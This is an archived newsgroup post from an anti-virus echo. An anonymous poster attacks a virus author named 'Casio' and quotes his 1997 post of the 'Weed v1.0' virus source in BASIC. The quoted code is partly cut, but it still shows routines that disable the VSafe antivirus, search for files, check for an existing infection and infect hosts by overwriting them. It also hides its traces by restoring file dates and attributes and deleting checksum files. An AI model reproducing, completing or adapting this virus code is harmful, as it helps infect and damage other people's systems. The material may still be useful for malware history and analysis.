TIP: Click on subject to list as thread!

ANSI

echo:	alt-comp-anti-virus
to:	ALL
from:	ANONYMOUS
date:	2014-12-30 22:46:00
subject:	Casio aka Gremlin aka Rai
Remember how he states again and again that he only posted these viruses on his web page, so he wasn't responsible what others who downloaded them did with them? LIAR! There are numerous instances in which he was caught dropping them into newsgroups. He even admitted such to Kim Neely in the Rolling Stones article. Here is His Nastiest at his worst posting the code for one of his viruses so others could use it to infect people. He's a nasty p.o.s. The only reason he stopped is because of the problem he had with the author ties for hosting the Melissa virus. Caught once more and it would be jail time for this corrupt punk. THAT'S why he - supposedly - stopped writing/passing viruses. I personally think he's still doing it on the sly, although I'm amazed he has had the self control to keep his mouth shut about it all this time. For a punk with no self control, that's been quite a feat. It's still existent on a certain site. And although I'm sure the present day AV products would take care of it, I'm not going to take a chance on posting it here so some newbie fool can use it and just possibly infect someone who doesn't run an AV. I did delete sections of it. From: Ca...@raiderz.com (Casio [SLAM]) Subject: an oldie.. Weed v1.0 Date: 1997/12/16 Message-ID: X-Deja-AN: 298624553 Organization: [SLAM] - LT Newsgroups: alt.comp.virus.source.code Heres weed v1.0 source to celebrate its wildlist status and its one year old now:) dim t1(3275) dim t2(3275) a$="WEED - v1.0" gosub bye_vsafe: vsafebak=cx gosub chklist: yourparm$=command$ yourparm$=ltrim$(yourparm$) yourparm$=rtrim$(yourparm$) N = LEN(YOURPARM$) A$ = CHR$(N) A$ = A$ + YOURPARM$ B$ = CHR$(13) A$ = A$ + B$ pass$=a$ x=0 rem REEFER virus version 1.0 rem t1 array holds us, t2 array holds original virus length of host, rem encrypted until needed for extraction of course :-) rem This virus has the ability to infect by overwriting and still rem allow the host to run normally. In fact, the host will have rem no idea that it has been infected! rem Variables used: rem Before we can begin, we need to load an image of ourselves. rem this saves on drive needs later! (I deleted a big chunk of it.) rem now, we need to run our new host :-) we can re-infect it afterwards rem by making a simple call to 'Lets_infect:' and passing the host rem filename. print #1,a$ else print #1,a$ NONULL endif next x a=filepos(1,eof) for x=1 to 3263 a=t2(x) a$=chr$(a) if a$="" then print #1,a$ else print #1,a$ NONULL endif next x close 1 newtime=oldtime newdate=olddate gosub set_fdt: newattr=fileattr gosub set_attr: gosub chklist: gosub res_vsafe: end rem We have completed replication. all stop! start_virus: kewl=0 ATTRIB=16 FILENAME$=FIND FIRST (proc$,attrib) gosub test_infection: if infected=0 then gosub lets_infect: endif while kewl<4 FILENAME$=FIND CONTINUE gosub test_infection: if infected=0 then gosub lets_infect: endif IF ERROR>0 THEN return endif wend Lets_infect: gosub get_fdt: gosub get_attr: fileattr=cx newattr=0 gosub set_attr: open"i",1,filename$ for x=1 to 3263 input #1,a$ BYTE a=asc(a$) a=a+192 t2(x)=a next x close 1 kill"chklist.ms" open"r",1,filename$ for x=1 to 3263 a=t1(x) a$=chr$(a) if a$="" then print #1,a$ else print #1,a$ NONULL endif next x a=filepos(1,eof) for x=1 to 3263 a=t2(x) a$=chr$(a) if a$="" then print #1,a$ else print #1,a$ NONULL endif next x close 1 gosub set_fdt: newattr=fileattr gosub set_attr: return REM ***** SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE! REM ***** THESE AREAS MUST NOT BE FOOLED WITH! find_my_name: AX = &HEX6200 INT86(&HEX21,AX,BX,NA,NA,NA,NA,NA,NA,NA) PSPSegment = BX rem Find environment address from PSP DEFSEG = PSPSegment a=peek(&hex2d) b=peek(&hex2c) EnvSegment = a * 256 EnvSegment = Envsegment + b rem Find the filename (deleted more) WEND EOT = 0 rem Set flag to exit while/wend loop ENDIF ELSE rem No-Read more environment string Offset = Offset + 1 ENDIF WEND ProgramName$ = FileN$ DEFSEG=-1 return get_attr: AX = &HEX4300 DX = VARPTR(Filename$) CX = NewAttr INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) return set_attr: AX = &HEX4301 DX = VARPTR(Filename$) CX = NewAttr INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) return bye_vsafe: ax=&hexfa02 dx=&hex5945 bx=0 int86(&hex16,ax,bx,cx,dx,na,na,na,na,na) return res_vsafe: ax=&hexfa02 dx=&hex5945 bx=vsafebak int86(&hex16,ax,bx,cx,dx,na,na,na,na,na) return get_fdt: AX=&HEX3D01 DX=varptr(filename$) INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) FILE_HANDLE=AX AX=&HEX5700 BX=FILE_HANDLE INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA) NEWDATE=CX NEWTIME=DX RETURN (deleted more) test_infection: filename$=virupath$+filename$ var$="" gosub get_attr: fileattr=newattr newattr=0 gosub set_attr: open"r",1,filename$ r=filepos(1,28) for x=1 to 4 input #1,a$ BYTE var$=var$+a$ next x close 1 newattr=fileattr gosub set_attr: if var$="????" then infected=1 else infected=0 endif return chklist: temp1$=filename$ filename$="chklist.ms" newattr=0 gosub set_attr: kill filename$ filename$=temp1$ return Casio [SLAM] - I've been to the dark side, I think I'll stay awhile. Your no longer above me, crying to understand me. So much for your, your constant bitching, so much for you. --- NewsGate v1.0 gamma 2 * Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)
SOURCE: echomail via QWK@docsplace.org

Email questions or comments to sysop@ipingthereforeiam.com
All parts of this website painstakingly hand-crafted in the U.S.A.!
IPTIA BBS/MUD/Terminal/Game Server List, © 2025 IPTIA Consulting™.